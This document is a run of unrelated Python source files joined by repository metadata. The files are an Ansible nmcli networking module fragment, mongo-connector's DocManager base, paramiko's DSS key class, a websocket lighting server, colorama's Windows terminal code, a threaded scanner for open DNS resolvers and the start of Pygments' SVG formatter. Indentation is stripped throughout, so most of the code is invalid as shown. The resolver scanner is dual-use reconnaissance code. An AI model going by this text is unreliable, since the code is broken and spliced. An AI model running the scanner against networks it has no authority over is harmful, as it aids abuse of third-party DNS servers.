# - nmcli: name=add conn_name=my-eth1 ifname=eth1 type=ethernet ip4=192.0.2.100/24 gw4=192.0.2.1 state=present
# nmcli con add con-name my-eth1 ifname eth1 type ethernet ip4 192.0.2.100/24 gw4 192.0.2.1
cmd.append('con')
cmd.append('add')
cmd.append('type')
cmd.append('ethernet')
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ip4')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('gw4')
cmd.append(self.gw4)
if self.ip6 is not None:
cmd.append('ip6')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('gw6')
cmd.append(self.gw6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
return cmd
def modify_connection_ethernet(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying ethernet interface
# To add an Ethernet connection with static IP configuration, issue a command as follows
# - nmcli: name=add conn_name=my-eth1 ifname=eth1 type=ethernet ip4=192.0.2.100/24 gw4=192.0.2.1 state=present
# nmcli con add con-name my-eth1 ifname eth1 type ethernet ip4 192.0.2.100/24 gw4 192.0.2.1
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ipv4.address')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('ipv4.gateway')
cmd.append(self.gw4)
if self.dns4 is not None:
cmd.append('ipv4.dns')
cmd.append(self.dns4)
if self.ip6 is not None:
cmd.append('ipv6.address')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('ipv6.gateway')
cmd.append(self.gw6)
if self.dns6 is not None:
cmd.append('ipv6.dns')
cmd.append(self.dns6)
if self.mtu is not None:
cmd.append('802-3-ethernet.mtu')
cmd.append(self.mtu)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
return cmd
def create_connection_bridge(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating bridge interface
return cmd
def modify_connection_bridge(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying bridge interface
return cmd
def create_connection_vlan(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating ethernet interface
return cmd
def modify_connection_vlan(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying ethernet interface
return cmd
def create_connection(self):
cmd=[]
if self.type=='team':
# cmd=self.create_connection_team()
if (self.dns4 is not None) or (self.dns6 is not None):
cmd=self.create_connection_team()
self.execute_command(cmd)
cmd=self.modify_connection_team()
self.execute_command(cmd)
cmd=self.up_connection()
return self.execute_command(cmd)
elif (self.dns4 is None) or (self.dns6 is None):
cmd=self.create_connection_team()
return self.execute_command(cmd)
elif self.type=='team-slave':
if self.mtu is not None:
cmd=self.create_connection_team_slave()
self.execute_command(cmd)
cmd=self.modify_connection_team_slave()
self.execute_command(cmd)
# cmd=self.up_connection()
return self.execute_command(cmd)
else:
cmd=self.create_connection_team_slave()
return self.execute_command(cmd)
elif self.type=='bond':
if (self.mtu is not None) or (self.dns4 is not None) or (self.dns6 is not None):
cmd=self.create_connection_bond()
self.execute_command(cmd)
cmd=self.modify_connection_bond()
self.execute_command(cmd)
cmd=self.up_connection()
return self.execute_command(cmd)
else:
cmd=self.create_connection_bond()
return self.execute_command(cmd)
elif self.type=='bond-slave':
cmd=self.create_connection_bond_slave()
elif self.type=='ethernet':
if (self.mtu is not None) or (self.dns4 is not None) or (self.dns6 is not None):
cmd=self.create_connection_ethernet()
self.execute_command(cmd)
cmd=self.modify_connection_ethernet()
self.execute_command(cmd)
cmd=self.up_connection()
return self.execute_command(cmd)
else:
cmd=self.create_connection_ethernet()
return self.execute_command(cmd)
elif self.type=='bridge':
cmd=self.create_connection_bridge()
elif self.type=='vlan':
cmd=self.create_connection_vlan()
return self.execute_command(cmd)
def remove_connection(self):
# self.down_connection()
cmd=[self.module.get_bin_path('nmcli', True)]
cmd.append('con')
cmd.append('del')
cmd.append(self.conn_name)
return self.execute_command(cmd)
def modify_connection(self):
cmd=[]
if self.type=='team':
cmd=self.modify_connection_team()
elif self.type=='team-slave':
cmd=self.modify_connection_team_slave()
elif self.type=='bond':
cmd=self.modify_connection_bond()
elif self.type=='bond-slave':
cmd=self.modify_connection_bond_slave()
elif self.type=='ethernet':
cmd=self.modify_connection_ethernet()
elif self.type=='bridge':
cmd=self.modify_connection_bridge()
elif self.type=='vlan':
cmd=self.modify_connection_vlan()
return self.execute_command(cmd)
def main():
# Parsing argument file
module=AnsibleModule(
argument_spec=dict(
autoconnect=dict(required=False, default=None, type='bool'),
state=dict(required=True, choices=['present', 'absent'], type='str'),
conn_name=dict(required=True, type='str'),
master=dict(required=False, default=None, type='str'),
ifname=dict(required=False, default=None, type='str'),
type=dict(required=False, default=None, choices=['ethernet', 'team', 'team-slave', 'bond', 'bond-slave', 'bridge', 'vlan'], type='str'),
ip4=dict(required=False, default=None, type='str'),
gw4=dict(required=False, default=None, type='str'),
dns4=dict(required=False, default=None, type='str'),
ip6=dict(required=False, default=None, type='str'),
gw6=dict(required=False, default=None, type='str'),
dns6=dict(required=False, default=None, type='str'),
# Bond Specific vars
            mode=dict(required=False, default="balance-rr", type='str', choices=["balance-rr", "active-backup", "balance-xor", "broadcast", "802.3ad",
                                                                                 "balance-tlb", "balance-alb"]),
miimon=dict(required=False, default=None, type='str'),
downdelay=dict(required=False, default=None, type='str'),
updelay=dict(required=False, default=None, type='str'),
arp_interval=dict(required=False, default=None, type='str'),
arp_ip_target=dict(required=False, default=None, type='str'),
# general usage
mtu=dict(required=False, default=None, type='str'),
mac=dict(required=False, default=None, type='str'),
# bridge specific vars
stp=dict(required=False, default=True, type='bool'),
priority=dict(required=False, default="128", type='str'),
slavepriority=dict(required=False, default="32", type='str'),
forwarddelay=dict(required=False, default="15", type='str'),
hellotime=dict(required=False, default="2", type='str'),
maxage=dict(required=False, default="20", type='str'),
ageingtime=dict(required=False, default="300", type='str'),
# vlan specific vars
vlanid=dict(required=False, default=None, type='str'),
vlandev=dict(required=False, default=None, type='str'),
flags=dict(required=False, default=None, type='str'),
ingress=dict(required=False, default=None, type='str'),
egress=dict(required=False, default=None, type='str'),
),
supports_check_mode=True
)
if not HAVE_DBUS:
module.fail_json(msg="This module requires dbus python bindings")
if not HAVE_NM_CLIENT:
module.fail_json(msg="This module requires NetworkManager glib API")
nmcli=Nmcli(module)
rc=None
out=''
err=''
result={}
result['conn_name']=nmcli.conn_name
result['state']=nmcli.state
# check for issues
if nmcli.conn_name is None:
nmcli.module.fail_json(msg="You haven't specified a name for the connection")
# team-slave checks
if nmcli.type=='team-slave' and nmcli.master is None:
nmcli.module.fail_json(msg="You haven't specified a name for the master so we're not changing a thing")
if nmcli.type=='team-slave' and nmcli.ifname is None:
nmcli.module.fail_json(msg="You haven't specified a name for the connection")
if nmcli.state=='absent':
if nmcli.connection_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err)=nmcli.down_connection()
(rc, out, err)=nmcli.remove_connection()
if rc!=0:
module.fail_json(name =('No Connection named %s exists' % nmcli.conn_name), msg=err, rc=rc)
elif nmcli.state=='present':
if nmcli.connection_exists():
# modify connection (note: this function is check mode aware)
# result['Connection']=('Connection %s of Type %s is not being added' % (nmcli.conn_name, nmcli.type))
result['Exists']='Connections do exist so we are modifying them'
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err)=nmcli.modify_connection()
if not nmcli.connection_exists():
result['Connection']=('Connection %s of Type %s is being added' % (nmcli.conn_name, nmcli.type))
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err)=nmcli.create_connection()
if rc is not None and rc!=0:
module.fail_json(name=nmcli.conn_name, msg=err, rc=rc)
if rc is None:
result['changed']=False
else:
result['changed']=True
if out:
result['stdout']=out
if err:
result['stderr']=err
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
vietanh85/mongo-connector
|
mongo_connector/doc_managers/doc_manager_base.py
|
33
|
5701
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from mongo_connector.compat import reraise
from mongo_connector.errors import UpdateDoesNotApply
class DocManagerBase(object):
"""Base class for all DocManager implementations."""
def apply_update(self, doc, update_spec):
"""Apply an update operation to a document."""
# Helper to cast a key for a list or dict, or raise ValueError
def _convert_or_raise(container, key):
if isinstance(container, dict):
return key
elif isinstance(container, list):
return int(key)
else:
raise ValueError
# Helper to retrieve (and/or create)
# a dot-separated path within a document.
def _retrieve_path(container, path, create=False):
looking_at = container
for part in path:
if isinstance(looking_at, dict):
if create and not part in looking_at:
looking_at[part] = {}
looking_at = looking_at[part]
elif isinstance(looking_at, list):
index = int(part)
# Do we need to create additional space in the array?
if create and len(looking_at) <= index:
# Fill buckets with None up to the index we need.
looking_at.extend(
[None] * (index - len(looking_at)))
# Bucket we need gets the empty dictionary.
looking_at.append({})
looking_at = looking_at[index]
else:
raise ValueError
return looking_at
# wholesale document replacement
if not "$set" in update_spec and not "$unset" in update_spec:
# update spec contains the new document in its entirety
return update_spec
else:
try:
# $set
for to_set in update_spec.get("$set", []):
value = update_spec['$set'][to_set]
if '.' in to_set:
path = to_set.split(".")
where = _retrieve_path(doc, path[:-1], create=True)
wl = len(where)
index = _convert_or_raise(where, path[-1])
if isinstance(where, list) and index >= wl:
where.extend([None] * (index + 1 - wl))
where[index] = value
else:
doc[to_set] = value
# $unset
for to_unset in update_spec.get("$unset", []):
if '.' in to_unset:
path = to_unset.split(".")
where = _retrieve_path(doc, path[:-1])
where.pop(_convert_or_raise(where, path[-1]))
else:
doc.pop(to_unset)
except (KeyError, ValueError, AttributeError, IndexError):
exc_t, exc_v, exc_tb = sys.exc_info()
reraise(UpdateDoesNotApply,
"Cannot apply update %r to %r" % (update_spec, doc),
exc_tb)
return doc
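    # Illustrative sketch (hypothetical document and update spec, not taken from
    # a real oplog entry) of how dotted $set paths touch dicts and lists:
    #   DocManagerBase().apply_update(
    #       {'a': {'b': 1}, 'c': [0, 1]},
    #       {'$set': {'a.b': 2, 'c.3': 9}})
    #   # => {'a': {'b': 2}, 'c': [0, 1, None, 9]}
    # Missing list slots are padded with None before the value is written.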
def bulk_upsert(self, docs, namespace, timestamp):
"""Upsert each document in a set of documents.
This method may be overridden to upsert many documents at once.
"""
for doc in docs:
self.upsert(doc, namespace, timestamp)
def update(self, doc, update_spec, namespace, timestamp):
"""Update a document.
``update_spec`` is the update operation as provided by an oplog record
in the "o" field.
"""
raise NotImplementedError
def upsert(self, document, namespace, timestamp):
"""(Re-)insert a document."""
raise NotImplementedError
def remove(self, document_id, namespace, timestamp):
"""Remove a document.
``document_id`` is a dict that provides the id of the document
to be removed. ``namespace`` and ``timestamp`` provide the database +
collection name and the timestamp from the corresponding oplog entry.
"""
raise NotImplementedError
def insert_file(self, f, namespace, timestamp):
"""Insert a file from GridFS."""
raise NotImplementedError
def handle_command(self, command_doc, namespace, timestamp):
"""Handle a MongoDB command."""
raise NotImplementedError
def search(self, start_ts, end_ts):
"""Get an iterable of documents that were inserted, updated, or deleted
between ``start_ts`` and ``end_ts``.
"""
raise NotImplementedError
def commit(self):
"""Commit all outstanding writes."""
raise NotImplementedError
def get_last_doc(self):
"""Get the document that was modified or deleted most recently."""
raise NotImplementedError
def stop(self):
"""Stop all threads started by this DocManager."""
raise NotImplementedError
|
apache-2.0
|
tghw/gotr-bowl
|
libs/paramiko/dsskey.py
|
7
|
6726
|
# Copyright (C) 2003-2007 Robey Pointer <[email protected]>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
L{DSSKey}
"""
from Crypto.PublicKey import DSA
from Crypto.Hash import SHA
from paramiko.common import *
from paramiko import util
from paramiko.ssh_exception import SSHException
from paramiko.message import Message
from paramiko.ber import BER, BERException
from paramiko.pkey import PKey
class DSSKey (PKey):
"""
    Representation of a DSS key which can be used to sign and verify SSH2
data.
"""
def __init__(self, msg=None, data=None, filename=None, password=None, vals=None, file_obj=None):
self.p = None
self.q = None
self.g = None
self.y = None
self.x = None
if file_obj is not None:
self._from_private_key(file_obj, password)
return
if filename is not None:
self._from_private_key_file(filename, password)
return
if (msg is None) and (data is not None):
msg = Message(data)
if vals is not None:
self.p, self.q, self.g, self.y = vals
else:
if msg is None:
raise SSHException('Key object may not be empty')
if msg.get_string() != 'ssh-dss':
raise SSHException('Invalid key')
self.p = msg.get_mpint()
self.q = msg.get_mpint()
self.g = msg.get_mpint()
self.y = msg.get_mpint()
self.size = util.bit_length(self.p)
def __str__(self):
m = Message()
m.add_string('ssh-dss')
m.add_mpint(self.p)
m.add_mpint(self.q)
m.add_mpint(self.g)
m.add_mpint(self.y)
return str(m)
def __hash__(self):
h = hash(self.get_name())
h = h * 37 + hash(self.p)
h = h * 37 + hash(self.q)
h = h * 37 + hash(self.g)
h = h * 37 + hash(self.y)
# h might be a long by now...
return hash(h)
def get_name(self):
return 'ssh-dss'
def get_bits(self):
return self.size
def can_sign(self):
return self.x is not None
def sign_ssh_data(self, rng, data):
digest = SHA.new(data).digest()
dss = DSA.construct((long(self.y), long(self.g), long(self.p), long(self.q), long(self.x)))
# generate a suitable k
qsize = len(util.deflate_long(self.q, 0))
while True:
k = util.inflate_long(rng.read(qsize), 1)
if (k > 2) and (k < self.q):
break
r, s = dss.sign(util.inflate_long(digest, 1), k)
m = Message()
m.add_string('ssh-dss')
# apparently, in rare cases, r or s may be shorter than 20 bytes!
rstr = util.deflate_long(r, 0)
sstr = util.deflate_long(s, 0)
if len(rstr) < 20:
rstr = '\x00' * (20 - len(rstr)) + rstr
if len(sstr) < 20:
sstr = '\x00' * (20 - len(sstr)) + sstr
m.add_string(rstr + sstr)
return m
def verify_ssh_sig(self, data, msg):
if len(str(msg)) == 40:
# spies.com bug: signature has no header
sig = str(msg)
else:
kind = msg.get_string()
if kind != 'ssh-dss':
return 0
sig = msg.get_string()
# pull out (r, s) which are NOT encoded as mpints
sigR = util.inflate_long(sig[:20], 1)
sigS = util.inflate_long(sig[20:], 1)
sigM = util.inflate_long(SHA.new(data).digest(), 1)
dss = DSA.construct((long(self.y), long(self.g), long(self.p), long(self.q)))
return dss.verify(sigM, (sigR, sigS))
def _encode_key(self):
if self.x is None:
raise SSHException('Not enough key information')
keylist = [ 0, self.p, self.q, self.g, self.y, self.x ]
try:
b = BER()
b.encode(keylist)
except BERException:
raise SSHException('Unable to create ber encoding of key')
return str(b)
def write_private_key_file(self, filename, password=None):
self._write_private_key_file('DSA', filename, self._encode_key(), password)
def write_private_key(self, file_obj, password=None):
self._write_private_key('DSA', file_obj, self._encode_key(), password)
def generate(bits=1024, progress_func=None):
"""
Generate a new private DSS key. This factory function can be used to
generate a new host key or authentication key.
@param bits: number of bits the generated key should be.
@type bits: int
@param progress_func: an optional function to call at key points in
key generation (used by C{pyCrypto.PublicKey}).
@type progress_func: function
@return: new private key
@rtype: L{DSSKey}
"""
dsa = DSA.generate(bits, rng.read, progress_func)
key = DSSKey(vals=(dsa.p, dsa.q, dsa.g, dsa.y))
key.x = dsa.x
return key
generate = staticmethod(generate)
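    # Illustrative usage per the docstring above (the key size and output path
    # are only examples):
    #   key = DSSKey.generate(bits=1024)
    #   key.write_private_key_file('/tmp/test_dss.key', password=None)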
### internals...
def _from_private_key_file(self, filename, password):
data = self._read_private_key_file('DSA', filename, password)
self._decode_key(data)
def _from_private_key(self, file_obj, password):
data = self._read_private_key('DSA', file_obj, password)
self._decode_key(data)
def _decode_key(self, data):
# private key file contains:
# DSAPrivateKey = { version = 0, p, q, g, y, x }
try:
keylist = BER(data).decode()
except BERException, x:
raise SSHException('Unable to parse key file: ' + str(x))
if (type(keylist) is not list) or (len(keylist) < 6) or (keylist[0] != 0):
raise SSHException('not a valid DSA private key file (bad ber encoding)')
self.p = keylist[1]
self.q = keylist[2]
self.g = keylist[3]
self.y = keylist[4]
self.x = keylist[5]
self.size = util.bit_length(self.p)
|
bsd-3-clause
|
RGreinacher/AmbiGrid
|
system/networkInterface.py
|
1
|
5800
|
#!/usr/local/bin/python3.4
# -*- coding: utf-8 -*-
# Read the README.md for a basic understanding of the server API.
# import python libs
import json
import asyncio
import socket
from autobahn.asyncio.websocket import WebSocketServerProtocol
from autobahn.asyncio.websocket import WebSocketServerFactory
# import project libs
import config
from issetHelper import IssetHelper
from colorController import ColorController
# This is a autobahn based web socket protocol for the AmbiGrid API.
# Read the README.md file to get an understanding of the API
class WebSocketProtocol(WebSocketServerProtocol, IssetHelper):
def onOpen(self):
if self.beVerbose: print('WebSocket connection open.')
def onConnect(self, request):
if self.beVerbose: print('\nClient connecting: {}'.format(request.peer))
self.animationController.setWebSocketHandler(self)
def onClose(self, wasClean, code, reason):
if self.beVerbose: print('\nWebSocket connection closed: {}'.format(reason))
self.animationController.unsetWebSocketHandler(self)
def onMessage(self, payload, isBinary):
if isBinary:
return
stringMessage = payload.decode('utf8')
response = {}
try:
jsonMessage = json.loads(stringMessage)
response = self.processRequest(jsonMessage)
except ValueError:
response = self.statusRequest()
self.sendDictionary(response)
def sendDictionary(self, dictionary):
responsAsJsonString = json.dumps(dictionary, ensure_ascii=False)
self.sendMessage(responsAsJsonString.encode('utf8'))
def setReferences(self, bridge, animationController, verbose):
self.bridge = bridge
self.animationController = animationController
self.colors = ColorController
self.beVerbose = verbose
def processRequest(self, requestData):
response = {}
if requestData['action'] == 'setAnimation':
self.setAnimationRequest(requestData)
elif requestData['action'] == 'setFadeOut':
self.setFadeOutRequest(requestData)
elif requestData['action'] == 'stopFadeOut':
self.stopFadeOutRequest()
elif requestData['action'] == 'setBaseColor':
self.setColorRequest(requestData)
response = self.statusRequest(requestData)
return response
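    # Illustrative request (hypothetical payload; the field names mirror
    # setColorRequest / setRgbColorRequest below):
    #   {"action": "setBaseColor", "type": "rgb", "red": 255, "green": 80, "blue": 0}
    # Whatever the action, the reply is the status dictionary from statusRequest().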
def statusRequest(self, requestData = None):
if (self.isset(requestData, 'details') and
requestData['details'] == True):
return self.animationController.getAllStati()
else:
return self.animationController.getStatus()
def setAnimationRequest(self, requestData):
if self.isset(requestData, 'name'):
self.animationController.showAnimation(requestData)
def setFadeOutRequest(self, requestData):
time = self.saveIntConvert(requestData['seconds'])
if time > 0:
self.animationController.setFadeOut(time)
def stopFadeOutRequest(self):
self.animationController.stopFadeOut()
def setColorRequest(self, requestData):
colorType = requestData['type']
if colorType == 'hex' and self.isInt(requestData['value'], 16):
return self.colors.setBasisColorAsHex(int(requestData['value'], 16))
elif colorType == 'rgb':
return self.setRgbColorRequest(requestData)
elif colorType == 'hsl':
return self.setHslColorRequest(requestData)
def setRgbColorRequest(self, requestData):
try:
redValue = int(requestData['red'])
greenValue = int(requestData['green'])
blueValue = int(requestData['blue'])
except (ValueError, TypeError):
return
if (redValue >= 0 and redValue <= 255 and
greenValue >= 0 and greenValue <= 255 and
blueValue >= 0 and blueValue <= 255):
self.colors.setBasisColorAsRgb(redValue, greenValue, blueValue)
def setHslColorRequest(self, requestData):
try:
hue = float(requestData['hue'])
saturation = float(requestData['saturation'])
lightness = float(requestData['lightness'])
except (ValueError, TypeError):
return
if (hue >= 0 and hue <= 1 and
saturation >= 0 and saturation <= 1 and
lightness >= 0 and lightness <= 1):
self.colors.setBasisColorAsHsl(hue, saturation, lightness)
class AmbiGridNetworking():
def __init__(self, wsPort, lightAnimationController, verbose = False):
# initializations
self.port = wsPort
self.animationController = lightAnimationController
self.beVerbose = verbose
# prepare the web socket protocol
webSocketProtocol = WebSocketProtocol
webSocketProtocol.setReferences(
webSocketProtocol, self, self.animationController, self.beVerbose)
# prepare the web sockets
factory = WebSocketServerFactory()
factory.protocol = webSocketProtocol
# get the host's IP
if config.AUTO_DETECT_HOST_IP:
host = socket.gethostbyname(socket.gethostname())
else:
host = config.HOST_IP
# start the server event loop
loop = asyncio.get_event_loop()
coro = loop.create_server(factory, host, self.port)
wsServer = loop.run_until_complete(coro)
try:
if self.beVerbose:
serverAddressString = host + ':' + str(self.port)
                print('WS server: launched at', serverAddressString)
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
wsServer.close()
loop.close()
|
mit
|
IT-Department-Projects/OOAD-Project
|
Flask_App/oakcrest/lib/python2.7/site-packages/pip/_vendor/colorama/winterm.py
|
578
|
6290
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from . import win32
# from wincon.h
class WinColor(object):
BLACK = 0
BLUE = 1
GREEN = 2
CYAN = 3
RED = 4
MAGENTA = 5
YELLOW = 6
GREY = 7
# from wincon.h
class WinStyle(object):
NORMAL = 0x00 # dim text, dim background
BRIGHT = 0x08 # bright text, dim background
BRIGHT_BACKGROUND = 0x80 # dim text, bright background
class WinTerm(object):
def __init__(self):
self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes
self.set_attrs(self._default)
self._default_fore = self._fore
self._default_back = self._back
self._default_style = self._style
# In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
# So that LIGHT_EX colors and BRIGHT style do not clobber each other,
# we track them separately, since LIGHT_EX is overwritten by Fore/Back
# and BRIGHT is overwritten by Style codes.
self._light = 0
def get_attrs(self):
return self._fore + self._back * 16 + (self._style | self._light)
def set_attrs(self, value):
self._fore = value & 7
self._back = (value >> 4) & 7
self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
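    # Illustrative round trip (the colour values are just an example):
    #   fore=RED(4), back=BLUE(1), style=BRIGHT(0x08) pack to 4 + 1*16 + 0x08 = 0x1c,
    #   and set_attrs(0x1c) recovers fore=4, back=1, style=0x08.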
def reset_all(self, on_stderr=None):
self.set_attrs(self._default)
self.set_console(attrs=self._default)
def fore(self, fore=None, light=False, on_stderr=False):
if fore is None:
fore = self._default_fore
self._fore = fore
# Emulate LIGHT_EX with BRIGHT Style
if light:
self._light |= WinStyle.BRIGHT
else:
self._light &= ~WinStyle.BRIGHT
self.set_console(on_stderr=on_stderr)
def back(self, back=None, light=False, on_stderr=False):
if back is None:
back = self._default_back
self._back = back
# Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
if light:
self._light |= WinStyle.BRIGHT_BACKGROUND
else:
self._light &= ~WinStyle.BRIGHT_BACKGROUND
self.set_console(on_stderr=on_stderr)
def style(self, style=None, on_stderr=False):
if style is None:
style = self._default_style
self._style = style
self.set_console(on_stderr=on_stderr)
def set_console(self, attrs=None, on_stderr=False):
if attrs is None:
attrs = self.get_attrs()
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleTextAttribute(handle, attrs)
def get_position(self, handle):
position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition
# Because Windows coordinates are 0-based,
# and win32.SetConsoleCursorPosition expects 1-based.
position.X += 1
position.Y += 1
return position
def set_cursor_position(self, position=None, on_stderr=False):
if position is None:
# I'm not currently tracking the position, so there is no default.
# position = self.get_position()
return
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleCursorPosition(handle, position)
def cursor_adjust(self, x, y, on_stderr=False):
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
position = self.get_position(handle)
adjusted_position = (position.Y + y, position.X + x)
win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
def erase_screen(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the screen.
# 1 should clear from the cursor to the beginning of the screen.
# 2 should clear the entire screen, and move cursor to (1,1)
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
# get the number of character cells in the current buffer
cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
# get number of character cells before current cursor position
cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = cells_in_screen - cells_before_cursor
if mode == 1:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_before_cursor
elif mode == 2:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_in_screen
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
if mode == 2:
# put the cursor where needed
win32.SetConsoleCursorPosition(handle, (1, 1))
def erase_line(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the line.
# 1 should clear from the cursor to the beginning of the line.
# 2 should clear the entire line.
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
if mode == 1:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwCursorPosition.X
elif mode == 2:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwSize.X
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
def set_title(self, title):
win32.SetConsoleTitle(title)
|
mit
|
jpverkamp/dnsscan
|
dnsscan_threads.py
|
1
|
2216
|
#!/usr/bin/env python
import os
import sys
import dns.resolver
import Queue
import time
import threading
# Various settings
numthreads = 150
resultList = []
wq = Queue.Queue()
# Expand a prefix (CIDR or single IP) into its individual IP addresses (generator)
def prefix_to_ips(prefix):
if '/' in prefix:
ip, size = prefix.split('/')
else:
ip = prefix
size = 32
ip = map(int, ip.split('.'))
size = 2 ** (32 - int(size))
for i in xrange(size):
yield '.'.join(map(str, ip))
ip[3] += 1
for i in xrange(3, 0, -1):
if ip[i] > 255:
ip[i] = 0
ip[i - 1] += 1
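# Illustrative usage (the prefix is only an example):
#   list(prefix_to_ips('10.0.0.252/30'))
#   # => ['10.0.0.252', '10.0.0.253', '10.0.0.254', '10.0.0.255']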
# Thread Launcher
def launchThreads(prefix,numthreads):
global wq
# Enqueing Stuff
for ip in prefix_to_ips(prefix):
wq.put(ip)
# Spawning Threads
for i in range(numthreads):
t = threading.Thread(target=tRun)
t.start()
while threading.active_count() > 1:
time.sleep(0.1)
# Thread
def tRun():
global wq
global resultList
while not wq.empty():
ip = wq.get()
resolver = dns.resolver.Resolver()
resolver.nameservers = [ip]
resolver.lifetime = 0.15
target = 'google.com'
try:
answers = resolver.query(target, 'A')
resultList.append('%s' % (ip))
# If no response do nothing
except (dns.resolver.NoAnswer, dns.resolver.NoNameservers), ex:
pass
# If timeout do nothing
except dns.resolver.Timeout, ex:
pass
# If something else went sideways do nothing
except:
pass
if __name__ == '__main__':
# Process command line options
import argparse
parser = argparse.ArgumentParser(description = 'Scan prefixes for open resolvers')
parser.add_argument('prefixes', nargs = argparse.REMAINDER, help = 'prefixes to scan')
args = parser.parse_args()
# Run scans, die properly on CTRL-C
try:
for prefix in args.prefixes:
launchThreads(prefix,numthreads)
# Print results
for x in resultList:
print x
print "Number of open resolvers: %s" %(len(resultList))
except KeyboardInterrupt, ex:
pass
|
mit
|
joshimio/blog
|
node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/formatters/svg.py
|
362
|
5867
|
# -*- coding: utf-8 -*-
"""
pygments.formatters.svg
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for SVG output.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import get_bool_opt, get_int_opt
__all__ = ['SvgFormatter']
def escape_html(text):
"""Escape &, <, > as well as single and double quotes for HTML."""
    return text.replace('&', '&amp;'). \
           replace('<', '&lt;'). \
           replace('>', '&gt;'). \
           replace('"', '&quot;'). \
           replace("'", '&#39;')
class2style = {}
class SvgFormatter(Formatter):
"""
Format tokens as an SVG graphics file. This formatter is still experimental.
Each line of code is a ``<text>`` element with explicit ``x`` and ``y``
coordinates containing ``<tspan>`` elements with the individual token styles.
By default, this formatter outputs a full SVG document including doctype
declaration and the ``<svg>`` root element.
*New in Pygments 0.9.*
Additional options accepted:
`nowrap`
Don't wrap the SVG ``<text>`` elements in ``<svg><g>`` elements and
don't add a XML declaration and a doctype. If true, the `fontfamily`
and `fontsize` options are ignored. Defaults to ``False``.
`fontfamily`
The value to give the wrapping ``<g>`` element's ``font-family``
attribute, defaults to ``"monospace"``.
`fontsize`
The value to give the wrapping ``<g>`` element's ``font-size``
attribute, defaults to ``"14px"``.
`xoffset`
Starting offset in X direction, defaults to ``0``.
`yoffset`
Starting offset in Y direction, defaults to the font size if it is given
